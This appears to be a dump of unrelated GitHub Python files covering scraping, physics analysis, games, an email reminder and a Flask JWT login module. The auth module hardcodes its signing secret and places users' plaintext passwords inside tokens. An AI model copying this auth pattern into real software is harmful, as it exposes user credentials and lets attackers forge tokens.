except:\n amcc.counts[credittype][creditsubtype] = count\n amcc.err = \"Non Int\"\n\n return amcc\n \n \n\n #######################################################################################################################################\n ## Artist Variations\n #######################################################################################################################################\n def getartistMBProfile(self):\n data = {} \n genres = self.bsdata.find(\"div\", {\"class\": \"genre-list\"})\n genre = self.getNamesAndURLs(genres)\n style = []\n data[\"Profile\"] = {'genre': genre, 'style': style}\n \n apc = artistMBProfileClass(profile=data.get(\"Profile\"), aliases=data.get(\"Aliases\"),\n members=data.get(\"Members\"), groups=data.get(\"In Groups\"),\n sites=data.get(\"Sites\"), variations=data.get(\"Variations\"))\n return apc\n\n\n \n #######################################################################################################################################\n ## Artist Pages\n #######################################################################################################################################\n def getartistMBPages(self):\n apc = artistMBPageClass()\n from numpy import ceil\n bsdata = self.bsdata\n\n try:\n pages = bsdata.find(\"ul\", {\"class\": \"pagination\"})\n lis = pages.findAll(\"li\")\n txts = [li.text for li in lis]\n npages = 0\n for item in txts:\n try:\n npages = max([npages, int(item)])\n except:\n continue\n \n apc = artistMBPageClass(ppp=100, tot=100*npages, redo=False, more=True)\n except:\n apc = artistMBPageClass(ppp=100, tot=1, redo=False, more=False)\n \n return apc\n\n\n\n def parse(self):\n bsdata = self.bsdata\n \n artist = self.getartistMBName()\n url = self.getartistMBURL()\n ID = self.getartistMBDiscID(url)\n pages = self.getartistMBPages()\n profile = self.getartistMBProfile()\n media = self.getartistMBMedia()\n mediaCounts = self.getartistMBMediaCounts(media)\n \n err = [artist.err, url.err, ID.err, pages.err, profile.err, mediaCounts.err, media.err]\n \n adc = artistMBDataClass(artist=artist, url=url, ID=ID, pages=pages, profile=profile, mediaCounts=mediaCounts, media=media, err=err)\n \n return adc","repo_name":"tgadf/discogs","sub_path":"artistMB.py","file_name":"artistMB.py","file_ext":"py","file_size_in_byte":16139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24379705191","text":"# -*- coding: utf-8 -*-\nimport jwt\nimport datetime\nimport functools\nfrom apps.nosql_db import r, r_3\nfrom jwt import exceptions\nfrom apps.error import ApiError\nfrom functools import wraps\nfrom flask import g, request, current_app, jsonify\n\n\n# 构造一个密钥\n# SALT = \"zhananbudanchou1234678\"\nSALT = \"mengnaiaihuachachacha\"\n\n# 构造 headers\nheaders = {\n \"typ\": \"jwt\",\n \"alg\": \"HS256\"\n}\n\n\n# 创建 JWT\ndef create_jwt(username, password):\n payload = {\n \"username\": username,\n \"password\": password\n }\n\n result = jwt.encode(payload=payload, key=SALT, algorithm=\"HS256\",\n headers=headers)\n return result\n\n\n# 用于认证普通用户\ndef login_required(func):\n\n @wraps(func)\n def decorate(*args, **kwargs):\n if hasattr(g, \"username\"):\n return g.username\n auth_jwt = request.headers.get('token')\n g.username = None\n try:\n \"判断token的校验结果\"\n payload = jwt.decode(auth_jwt, SALT, algorithms=['HS256'])\n \"获取载荷中的信息赋值给g对象\"\n g.username = payload.get(\"username\")\n # print(g.username)\n assert r.get(g.username) == auth_jwt\n except Exception as e:\n print(e)\n return jsonify({\n \"code\": 201,\n \"message\": \"抱歉,用户未登录!\",\n \"data\": None,\n \"ok\": False\n })\n\n return func(*args, **kwargs)\n\n return decorate\n\n\n# 单独实现一个解析jwt_token的函数\ndef parse_jwt(auth_jwt, db):\n payload = jwt.decode(auth_jwt, SALT, algorithms=['HS256'])\n user = db.find_one({\"username\": payload.get(\"username\")})\n return user\n\n\n# 用于认证后台管理用户\ndef permission_required(func):\n @wraps(func)\n def decorate(*args, **kwargs):\n if hasattr(g, \"admin_username\"):\n return g.admin_username\n x_api_key = request.headers.get(\"XAPIKEY\")\n g.admin_username = None\n try:\n g.admin_username = r_3.get(x_api_key)\n assert x_api_key == r_3.get(g.admin_username)\n except Exception as e:\n print(e)\n return jsonify({\n \"code\": 201,\n \"message\": \"抱歉,用户权限认证失败!\",\n \"data\": None,\n \"ok\": False\n })\n return func(*args, **kwargs)\n\n return decorate\n\n\n\n","repo_name":"WanwanLinLin/FlaskBackend","sub_path":"apps/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71257077265","text":"\"\"\"\nconfig.py\n~~~~~~~~~\n\nCommon configuration settings for scripts used to make the AgroSuccess \nsuccession rules table.\n\"\"\"\nimport os \nimport sys\n\nDATA_DIR = os.path.abspath(\"/home/andrew/Documents/phd/models/\"\n \"AgroSuccess/data\")\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\nDIRS = {\n \"scripts\": THIS_DIR,\n \"logs\": os.path.join(THIS_DIR, \"logs\"),\n \"data\": {\n \"raw\": os.path.join(DATA_DIR, \"raw\"),\n \"created\": os.path.join(DATA_DIR, \"created\"),\n \"tmp\": os.path.join(DATA_DIR, \"tmp\"),\n },\n}\n\ndef ensure_dirs_exist(dir_list):\n \"\"\"Given list of dir names, recursively create dirs if they don't exist.\"\"\"\n for d in dir_list:\n try:\n os.makedirs(d)\n except FileExistsError:\n pass\n\ndef exit_if_file_missing(fname):\n \"\"\"Exit program if given file name doesn't exit.\"\"\"\n if not os.path.isfile(fname):\n sys.exit(\"Source file {0} does not exist.\".format(fname))\n\n# Check if all data and logs directories exist, make them if not\nensure_dirs_exist(list(DIRS[\"data\"].values()) + [DIRS[\"logs\"]])","repo_name":"lanecodes/agrosuccess-graph","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31823031969","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pyevtk.hl import gridToVTK\n\ndef mandelbrot_set(X, Y, maxiter, horizon = 2.0):\n C = X + Y[:, None] * 1j\n N = np.zeros(C.shape, dtype = int)\n Z = np.zeros(C.shape, np.complex64)\n for n in range(maxiter):\n if n % (maxiter / 10) == 0:\n print('progress: %d/%d' % (n, maxiter))\n I = np.less(abs(Z), horizon)\n N[I] = n\n Z[I] = Z[I] ** 2 + C[I]\n return Z.transpose(), N.transpose()\n\nnx = 800\nny = 600\nx = np.linspace(-2.25, 0.75, nx, dtype=np.float32)\ny = np.linspace(-1.25, 1.25, ny, dtype=np.float32)\nz = np.linspace(0.0, 1.0, 1, dtype=np.float32)\n\nZ, N = mandelbrot_set(x, y, 2000, 2.0)\n\nfilename = 'mandel_grid'\n\ngridToVTK(filename, x, y, z, pointData = {'N': N.reshape((nx, ny, 1), order = 'C')})\n\nprint('%s.vtr generated' % (filename))\n","repo_name":"dubrayn/dubrayn.github.io","sub_path":"examples/vtk/pyevtk_grid.py","file_name":"pyevtk_grid.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"69884265747","text":"with open('text.txt', 'r') as cats:\n \n dict_cat = []\n list_cats = cats.readlines()\n for i in list_cats:\n \n keys = ['id', 'name', 'age']\n i = tuple(i.strip().split(','))\n dictionary = dict(zip(keys, i))\n dict_cat.append(dictionary)\n \n print(dict_cat)\n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # for i in cats:\n # list_cats += i.split('\\n')\n # new_list_cats = list_cats[::2]\n # print(new_list_cats)\n #result = [{'id': d[0], 'name': d[1], 'number': d[2]} for d in data]\n\n \n","repo_name":"Ihor-Usenko/go_it","sub_path":"06working_with_files/auto_05.py","file_name":"auto_05.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2691776561","text":"from __future__ import annotations\nfrom os.path import basename, splitext\nfrom typing import Optional\n\nfrom .nodes import TydDocument\nfrom .tyd_from_text import parse\nfrom .tyd_to_text import dump\n\n\ndef from_document(doc: TydDocument, file_path: Optional[str] = None) -> TydFile:\n \"\"\"Returns TydFile object created from a TydDocument object.\n\n Parameters\n ----------\n doc : TydDocument\n A TydDocument object to use to create TydFile.\n file_path : Optional[str]\n A string representing file path, by default None.\n\n Returns\n -------\n TydFile\n A TydFile created.\n \"\"\"\n tyd_file = TydFile(doc, file_path)\n return tyd_file\n\n\ndef from_file(file_path: str) -> TydFile:\n \"\"\"Returns TydFile object created from a file of path passed.\n\n Parameters\n ----------\n file_path : str\n A string representing filepath.\n\n Returns\n -------\n TydFile\n A TydFile created.\n \"\"\"\n try:\n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n read_contents = f.read()\n\n tyd_node_list = list(parse(read_contents))\n tyd_doc = TydDocument(tyd_node_list)\n return from_document(tyd_doc, file_path)\n except Exception as e:\n raise Exception(f\"Exception loading {file_path}: {e}\")\n\n\nclass TydFile:\n \"\"\"This represents tyd file objects.\n\n **Don't instance!**\n The class is not intended to be created by users.\n You can get instances of the class only via class methods.\n \"\"\"\n\n def __init__(self, doc: TydDocument, file_path: Optional[str] = None):\n self._doc: TydDocument = doc\n self._file_path: Optional[str] = file_path\n\n @property\n def document(self) -> TydDocument:\n return self._doc\n\n @document.setter\n def document(self, value: TydDocument) -> None:\n self._doc = value\n\n @property\n def file_path(self) -> Optional[str]:\n return self._file_path\n\n @property\n def file_name(self) -> str:\n return splitext(basename(self._file_path))[0]\n\n def save(self, file_path: Optional[str]=None):\n if file_path is not None:\n self._file_path = file_path\n elif file_path is None:\n raise AttributeError(\n \"When didn't set filepath to TydFile, filepath parameter mustn't be None.\"\n )\n\n builder = []\n\n for node in self._doc:\n builder.append(dump(node) + \"\\n\")\n\n with open(file_path, mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\"\".join(builder))\n","repo_name":"Lazialize/tyd-python","sub_path":"tyd/tyd_file.py","file_name":"tyd_file.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6240655903","text":"\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_probability as tfp\n\nclass CreateActorNetwork(keras.Model):\n def __init__(self, n_actions, fc1_dims=256, fc2_dims=256):\n super(CreateActorNetwork, self).__init__()\n self.n_actions = n_actions\n self.fc1_dims = fc1_dims\n self.fc2_dims = fc2_dims\n\n self.fc1 = tf.keras.layers.Dense(fc1_dims, activation=\"relu\")\n self.fc2 = tf.keras.layers.Dense(fc2_dims, activation=\"relu\")\n self.mean = tf.keras.layers.Dense(n_actions, activation=None)\n self.stddev = tf.keras.layers.Dense(n_actions, activation=\"sigmoid\")\n\n def call(self, state):\n probs = self.fc1(state)\n probs = self.fc2(probs)\n mean = self.mean(probs)\n stddev = self.mean(probs)\n return mean, stddev\n\n def sample_action(self, state):\n mean, stddev = self.call(state)\n dist = tfp.distributions.Normal(mean, stddev)\n action = dist.sample()\n return action, dist.log_prob(action)\n\n\n\nclass CreateCriticNetwork(keras.Model):\n def __init__(self, n_actions, fc1_dims=256, fc2_dims=256):\n super(CreateCriticNetwork, self).__init__()\n self.n_actions = n_actions\n self.fc1_dims = fc1_dims\n self.fc2_dims = fc2_dims\n\n self.fc1 = tf.keras.layers.Dense(fc1_dims, activation=\"relu\")\n self.fc2 = tf.keras.layers.Dense(fc2_dims, activation=\"relu\")\n self.v = tf.keras.layers.Dense(1, activation=None)\n\n def call(self, state, action):\n state_values = self.fc1(tf.concat([state, action], 1))\n state_values = self.fc2(state_values)\n value = self.v(state_values)\n return value\n\n\nclass CreateValueNetwork(keras.Model):\n def __init__(self, n_actions, fc1_dims=256, fc2_dims=256):\n super(CreateValueNetwork, self).__init__()\n self.n_actions = n_actions\n self.fc1_dims = fc1_dims\n self.fc2_dims = fc2_dims\n\n self.fc1 = tf.keras.layers.Dense(fc1_dims, activation=\"relu\")\n self.fc2 = tf.keras.layers.Dense(fc2_dims, activation=\"relu\")\n self.v = tf.keras.layers.Dense(1, activation=None)\n\n def call(self, state):\n state_values = self.fc1(state)\n state_values = self.fc2(state_values)\n value = self.v(state_values)\n return value\n\n\n\n\n\n\n\n","repo_name":"oeg1n18/RL_Library","sub_path":"Networks/SACNet.py","file_name":"SACNet.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33923061311","text":"import smtplib\nfrom email.mime.text import MIMEText\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport logging\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\n# list for recipients\nemailRecipients = []\nerrorRecipient = []\n\n# enviroment variables setup\nxPath = os.getenv(\"XLSXPATH\")\nlogPath = os.getenv(\"LOGFILEPATH\")\nenvRecipients = os.getenv(\"EMAILRECIPIENTS\")\nerrorRecipient.append(os.getenv(\"ERRORRECIPIENT\"))\nerrorRecipientSTR = os.getenv(\"ERRORRECIPIENT\")\nenvSender = os.getenv(\"SENDER\")\nenvSmtpPass = os.getenv(\"SMTP_PASS\")\n\n# env list\nfor email in envRecipients.split(\",\"):\n emailRecipients.append(email)\n\nlogging.basicConfig(filename=logPath, level=logging.INFO)\n\ndef main():\n try:\n with open(xPath, \"rb\") as f:\n df = pd.read_excel(f, skiprows=3, engine='openpyxl')\n except Exception as err:\n errorMail(err)\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" Hiba a file megnyitásakor: \" + f\"{err}\")\n exit(1)\n\n dateCompare = datetime.today() + timedelta(days=40)\n\n for index, row in df.iterrows():\n if row['Dátum'] < dateCompare:\n datum = row['Dátum'].strftime(\"%Y.%m.%d\")\n okmany = row['Okmány']\n subject = f'{okmany} Lejáró okmány {datum}'\n body = f'Emlékeztető email lejáró okmányról.\\n {datum} {okmany}'\n recipients = emailRecipients\n try:\n send_email(subject, body, recipients)\n except smtplib.SMTPException as e:\n errorMail(e)\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" Nem sikerült elküldeni a levelet hiba: \" + f\"{e}\")\n exit(1)\n\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" sikeres küldés\")\n\ndef errorMail(err):\n subject = 'Ertesito email hiba'\n body = f\"Hiba - ellenőrizd a logot: \\n {err}\"\n recipients = errorRecipientSTR\n\n try:\n send_email(subject, body, recipients)\n except smtplib.SMTPException as e:\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" Nem sikerült elküldeni a levelet hiba: \" + f\"{e}\")\n\n\ndef send_email(subject, body, recipients):\n msg = MIMEText(body.encode('utf-8'), \"plain\", \"utf-8\")\n msg['Subject'] = subject\n msg['From'] = envSender\n msg['To'] = ', '.join(recipients)\n\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:\n server.login('f.ferenc@lazarteam.hu', envSmtpPass)\n server.sendmail(envSender, recipients, msg.as_string())\n print(\"Üzenet elküldve!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sontii/lazar-reminder","sub_path":"sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10714459547","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nimport re\nfrom sys import argv\n\nif len(argv) < 4:\n\tprint(\"python billboard_fetch.py .sng \")\n\texit()\n\n# fancy log printing stuff\nclass bcolors:\n\tHEADER = '\\033[95m'\n\tOKBLUE = '\\033[94m'\n\tOKGREEN = '\\033[92m'\n\tWARNING = '\\033[93m'\n\tFAIL = '\\033[91m'\n\tENDC = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Loading options for browser...\")\noptions = Options()\noptions.add_argument(\"--headless\")\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Loaded options for browser.\")\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Loading browser driver...\")\ndriver = webdriver.Firefox(firefox_options=options)\ndriver.set_page_load_timeout(10)\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Loaded broswer driver.\")\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Loading website {}...\".format(\"https://www.billboard.com/charts/\" + argv[1]))\ntry:\n\tdriver.get(\"https://www.billboard.com/charts/\" + argv[1])\nexcept:\n\tdriver.execute_script(\"window.stop();\")\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Website loaded.\")\n\nsrc = driver.page_source\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Page source code copied.\")\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Closing driver...\")\ndriver.close()\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Driver closed.\")\n\nlines = src.split(\"\\n\")\n\nsng_text = [\"\\n\"]\n\nsng_text.append(\"--{}\".format(argv[3]))\n\nfor i in range(len(lines)):\n\tif lines[i] == '
':\n\t\tblock = [lines[x] for x in range(i, i + 12)]\n\t\tsong = \" ~ \".join([line for line in block if line[0] != \"<\" and line[1] != \"<\"])\n\t\tif song[0] == \" \":\n\t\t\tsong = song[1:]\n\t\tsong = song.replace(\"&\", \"&\")\n\t\tsng_text.append(song)\n\telif '
' in lines[i]:\n\t\tsong = lines[i][37:len(lines[i]) - 6] + \" ~ \"\n\t\tj = i + 1\n\t\twhile any([x == \"<\" for x in lines[j][:2]]):\n\t\t\tj += 1\n\t\tsong += lines[j]\n\t\tif song[0] == \" \":\n\t\t\tsong = song[1:]\n\t\tsong = song.replace(\"&\", \"&\")\n\t\tsng_text.append(song)\n\nsng_text.append(\"--end\")\n\nwith open(argv[2], \"a+\") as sng:\n\tsng.write(\"\\n\".join(sng_text))","repo_name":"roshanmaind/Friday","sub_path":"dev_tools/sam/billboard_fetch.py","file_name":"billboard_fetch.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"22662643219","text":"import pygame\r\nimport random\r\npygame.init()\r\nfrom imgs import Screen\r\nfrom Write import Display_message\r\nfrom Colors import white\r\nfrom Colors import red\r\nfrom Colors import green\r\nfrom Colors import blue\r\n\r\n\r\n\r\n###############################BOARD##################################\r\n\r\nclass Board:\r\n def __init__(self):\r\n self.grid =[[1]*8 for _ in range(8)] \r\n def setship(self,x,y,o):\r\n if(o==1):\r\n self.grid[x][y]=0\r\n self.grid[x+1][y]=0\r\n elif(o==0):\r\n self.grid[x][y]=0\r\n self.grid[x][y+1]=0\r\n def setsubmarine(self,x,y,o):\r\n if(y>4 and x>4):\r\n o=-1\r\n if(y>4 and x<4):\r\n o=1\r\n if(o==-1):\r\n self.grid[x][y]=4\r\n self.grid[x-1][y]=4\r\n self.grid[x-2][y]=4\r\n self.grid[x-3][y]=4\r\n if(o==1):\r\n self.grid[x][y]=4\r\n self.grid[x+1][y]=4\r\n self.grid[x+2][y]=4\r\n self.grid[x+3][y]=4\r\n elif(o==0):\r\n self.grid[x][y]=4\r\n self.grid[x][y+1]=4\r\n self.grid[x][y+2]=4\r\n self.grid[x][y+3]=4\r\n def printboard(self,com=False):\r\n print()\r\n num=-1\r\n nm=-1\r\n for i in range(9):\r\n for j in range(9):\r\n if(i==0 or j==0):\r\n z=\"0\"\r\n if(i==0):\r\n num=str(num)\r\n z=num\r\n num=int(num)\r\n num=num+1\r\n if(j==0):\r\n nm=str(nm)\r\n z=nm\r\n nm=int(nm)\r\n nm=nm+1 \r\n if(z!='-1'):\r\n pygame.draw.rect(Screen, white,((30*i)+20,(30*j)+20,28,28),1)\r\n Display_message(z, (30*i)+32, (30*j)+37, 20, 'Calibri')\r\n pygame.draw.rect(Screen, white,((30*i)+570,(30*j)+370,28,28),1)\r\n Display_message(z, (30*i)+582, (30*j)+387, 20, 'Calibri')\r\n pygame.display.update()\r\n for i in range(len(self.grid)):\r\n for j in range(len(self.grid[i])):\r\n if(com==False):\r\n if(self.grid[i][j]==1):\r\n '''print(\"*\",end=\" \")'''\r\n pygame.draw.rect(Screen, white,((30*i)+50,(30*j)+50,28,28,),1)\r\n pygame.display.update()\r\n elif(self.grid[i][j]==2):\r\n pygame.draw.rect(Screen, red,((30*i)+50,(30*j)+50,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==0 or self.grid[i][j]==4):\r\n '''print(\"S\",end=\" \")'''\r\n pygame.draw.rect(Screen,green,((30*i)+50,(30*j)+50,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==3):\r\n pygame.draw.rect(Screen,blue,((30*i)+50,(30*j)+50,28,28))\r\n pygame.display.update()\r\n elif(com==True):\r\n if(self.grid[i][j]==1):\r\n '''print(\"*\",end=\" \")'''\r\n pygame.draw.rect(Screen, white,((30*i)+600,(30*j)+400,28,28),1)\r\n pygame.display.update()\r\n elif(self.grid[i][j]==2):\r\n pygame.draw.rect(Screen, red,((30*i)+600,(30*j)+400,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==0 or self.grid[i][j]==4):\r\n '''print(\"S\",end=\" \")'''\r\n pygame.draw.rect(Screen, green,((30*i)+600,(30*j)+400,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==3):\r\n pygame.draw.rect(Screen, blue,((30*i)+600,(30*j)+400,28,28))\r\n pygame.display.update()\r\n print()\r\n \r\n def attack(self,x,y,com=False):\r\n count_ships=0\r\n if(self.grid[x][y]==3 and com ==True):\r\n x=random.choice([1,2,3,4,5,6,7,0])\r\n y=random.choice([1,2,3,4,5,6,7,0])\r\n if(self.grid[x][y]==0 or self.grid[x][y]==4):\r\n self.grid[x][y]=2\r\n elif(self.grid[x][y]==1):\r\n self.grid[x][y]=3\r\n for i in range(len(self.grid)):\r\n for j in range(len(self.grid[i])):\r\n if(self.grid[i][j]==0 or self.grid[i][j]==4):\r\n count_ships=count_ships+1\r\n if(count_ships==0 and com==True):\r\n Display_message(\"Player WON !\", 526, 100, 50, 'Serif')\r\n if(count_ships==0 and com==False):\r\n Display_message(\"Player LOST !\", 526, 100, 50, 'Serif')\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"SyedAR-17/Battle-Ship","sub_path":"Game_Board.py","file_name":"Game_Board.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72240118866","text":"#Exercise 7\r\n\r\nimport string\r\n\r\nall_char = string.printable\r\nall_num = string.digits\r\nall_special_char = string.punctuation\r\n\r\nall_things = [all_char, all_num, all_special_char]\r\n\r\nfile = open(\"jumble.txt\",\"r\")\r\n\r\nspace, tab, returns = 0,0,0\r\n\r\nfor line in file:\r\n for char in line:\r\n if char == \"\\n\":\r\n returns += 1\r\n elif char not in all_things and not char.isspace():\r\n tab += 1\r\n elif char == \" \":\r\n space += 1\r\n \r\n \r\nprint(\"No. spaces:\",space)\r\nprint(\"No. tabs:\", tab)\r\nprint(\"No. returns:\",returns)","repo_name":"baselhusam/The-Practice-of-Computing-Using-Python-Solved","sub_path":"Chapter 6/Problem 7/Problem 7.py","file_name":"Problem 7.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26866655856","text":"import sys\nimport ROOT\n\nprint (\"Load cxx analyzers ... \",)\nROOT.gSystem.Load(\"libedm4hep\")\nROOT.gSystem.Load(\"libpodio\")\nROOT.gSystem.Load(\"libFCCAnalyses\")\nROOT.gSystem.Load(\"libFCCAnalysesFlavour\")\n\nROOT.gErrorIgnoreLevel = ROOT.kFatal\n_edm = ROOT.edm4hep.ReconstructedParticleData()\n_pod = ROOT.podio.ObjectID()\n_fcc = ROOT.dummyLoader\n_bs = ROOT.dummyLoaderFlavour\n\n\n\n\nprint ('edm4hep ',_edm)\nprint ('podio ',_pod)\nprint ('fccana ',_fcc)\n\n#\n#\tThis is used to process a file in which the Bs and the Bsbar are forced\n#\tto decay into Jpsi ( -> mu mu) + Phi ( -> K K )\n#\tWe reconstruct the secondary vertex from the 2 muon and 2 kaon tracks.\n# The example also shows how to retrieve the MC and reco'ed Bs legs,\n# as well as the MC Bs, JP]psi and Phis, with their kinematics.\n#\n# Example file: \n# /eos/experiment/fcc/ee/examples/lowerTriangle/p8_ecm91GeV_Zbb_EvtGen_Bs2JpsiPhi_IDEAtrkCov.root\n# \tNote: these events were generated at (0,0,0), i.e.no smearing of the\n#\tprimary vertex.\n#\n\nclass analysis():\n\n #__________________________________________________________\n def __init__(self, inputlist, outname, ncpu):\n self.outname = outname\n if \".root\" not in outname:\n self.outname+=\".root\"\n\n #ROOT.ROOT.EnableImplicitMT(ncpu)\n\n self.df = ROOT.RDataFrame(\"events\", inputlist)\n print (\" done\")\n #__________________________________________________________\n def run(self):\n #df2 = (self.df.Range(1000)\t# to test over 1000 events only\n df2 = (self.df\n\n .Alias(\"Particle1\", \"Particle#1.index\")\n .Alias(\"MCRecoAssociations0\", \"MCRecoAssociations#0.index\")\n .Alias(\"MCRecoAssociations1\", \"MCRecoAssociations#1.index\")\n\n\n # MC event primary vertex\n .Define(\"MC_PrimaryVertex\", \"MCParticle::get_EventPrimaryVertex(21)( Particle )\" )\n\n # number of tracks in the event\n .Define(\"ntracks\",\"ReconstructedParticle2Track::getTK_n(EFlowTrack_1)\")\n\n # Retrieve the decay vertex of all MC particles\n #.Define(\"MC_DecayVertices\", \"MCParticle::get_endPoint( Particle, Particle1)\" )\n\n\n # MC indices of the decay Bs (PDG = 531) -> mu+ (PDG = -13) mu- (PDG = 13) K+ (PDG = 321) K- (PDG = -321)\n # Retrieves a vector of int's which correspond to indices in the Particle block\n # vector[0] = the mother, and then the daughters in the order specified, i.e. here\n # [1] = the mu+, [2] = the mu-, [3] = the K+, [4] = the K-\n # The first boolean below: when set to true, the dsughters specified in the list are looked\n # for among the final, stable particles that come out from the mother, i.e. the decay tree is\n\t # explored recursively if needed.\n # The second boolean: when set to true, the charge conjugate decays are included too.\n # If the event contains more than one such decays,only the first one is kept.\n\t # get_indices_ExclusiveDecay looks for an exclusive decay: if a mother is found, that decays \n # into the particles specified in the list plus other particle(s), this decay is not selected.\n .Define(\"Bs2MuMuKK_indices\", \"MCParticle::get_indices_ExclusiveDecay( 531, {-13,13,321,-321}, true, true) ( Particle, Particle1)\" )\n\n # the MC Bs : the Bs is the first particle in the Bs2MuMuKK_indices vector\n .Define(\"Bs\", \"selMC_leg(0) ( Bs2MuMuKK_indices, Particle )\")\n\n # and the MC legs of the Bs : the mu+ is the second particle in the vector, etc.\n .Define(\"Muplus\", \" selMC_leg(1)( Bs2MuMuKK_indices, Particle )\")\n .Define(\"Muminus\", \" selMC_leg(2)( Bs2MuMuKK_indices, Particle )\")\n .Define(\"Kplus\", \" selMC_leg(3)( Bs2MuMuKK_indices, Particle )\")\n .Define(\"Kminus\", \" selMC_leg(4)( Bs2MuMuKK_indices, Particle )\")\n\n # Kinematics of the Bs legs (MC) :\n .Define(\"Muplus_theta\", \"MCParticle::get_theta( Muplus )\")\n .Define(\"Muplus_phi\", \"MCParticle::get_phi( Muplus )\")\n .Define(\"Muplus_e\", \"MCParticle::get_e( Muplus )\")\n .Define(\"Muminus_theta\", \"MCParticle::get_theta( Muminus )\")\n .Define(\"Muminus_phi\", \"MCParticle::get_phi( Muminus )\")\n .Define(\"Muminus_e\", \"MCParticle::get_e( Muminus )\")\n .Define(\"Kplus_theta\", \"MCParticle::get_theta( Kplus )\")\n .Define(\"Kplus_phi\", \"MCParticle::get_phi( Kplus )\")\n .Define(\"Kplus_e\", \"MCParticle::get_e( Kplus )\")\n .Define(\"Kminus_theta\", \"MCParticle::get_theta( Kminus )\")\n .Define(\"Kminus_phi\", \"MCParticle::get_phi( Kminus )\")\n .Define(\"Kminus_e\", \"MCParticle::get_e( Kminus )\")\n\n\t # Kinematics of the mother Bs (MC)\n .Define(\"Bs_theta\", \"MCParticle::get_theta( Bs )\")\n .Define(\"Bs_phi\", \"MCParticle::get_phi( Bs )\")\n .Define(\"Bs_e\", \"MCParticle::get_e( Bs )\")\n\n \n # Decay vertex of the Bs (MC)\n # Careful with getMC_decayVertex: if Bs -> Bsbar, this returns the prod vertex of the Bsbar !\n #.Define(\"BsDecayVertex\", \"getMC_decayVertex(531, false)( Particle, Particle1)\")\n # Hence, use instead a custom method in Bs2JPsiPhi :\n .Define(\"BsMCDecayVertex\", \"BsMCDecayVertex( Bs2MuMuKK_indices, Particle )\")\n\n # Returns the RecoParticles associated with the four Bs decay products.\n # The size of this collection is always 4 provided that Bs2MuMuKK_indices is not empty,\n # possibly including \"dummy\" particles in case one of the legs did not make a RecoParticle.\n # This is done on purpose, in order to maintain the mapping with the indices - i.e. the 1st particle in \n # the list BsRecoParticles is the mu+, then the mu-, etc.\n # (selRP_matched_to_list ignores the unstable MC particles that are in the input list of indices\n \t # hence the mother particle, which is the [0] element of the Bs2MuMuKK_indices vector).\n .Define(\"BsRecoParticles\", \"ReconstructedParticle2MC::selRP_matched_to_list( Bs2MuMuKK_indices, MCRecoAssociations0,MCRecoAssociations1,ReconstructedParticles,Particle)\")\n\n # the corresponding tracks - here, dummy particles, if any, are removed, i.e. one may have < 4 tracks,\n # e.g. if one muon or kaon was emitted outside of the acceptance\n .Define(\"BsTracks\", \"ReconstructedParticle2Track::getRP2TRK( BsRecoParticles, EFlowTrack_1)\" )\n\n # number of tracks in this BsTracks collection ( = the #tracks used to reconstruct 